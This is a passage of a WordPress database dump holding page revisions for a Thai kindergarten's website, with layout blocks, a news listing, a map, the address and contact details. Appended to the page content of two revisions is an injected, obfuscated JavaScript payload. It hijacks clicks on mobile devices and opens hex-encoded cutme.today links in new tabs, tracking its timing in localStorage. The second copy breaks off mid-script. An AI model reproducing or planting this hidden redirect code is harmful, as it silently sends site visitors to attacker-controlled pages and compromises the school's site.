-->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:52:42','2024-07-29 11:52:42','',19,'http://watprato.ssk.in.th/?p=126',0,'revision','',0),
(127,1,'2024-07-29 18:53:56','2024-07-29 11:53:56','<!-- wp:generateblocks/image {\"uniqueId\":\"1eea8d01\",\"mediaId\":128,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-1eea8d01\"><img class=\"gb-image gb-image-1eea8d01\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/450250828_122162185154202781_8649375950099252526_n-1.jpg\" alt=\"\" title=\"450250828_122162185154202781_8649375950099252526_n (1)\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 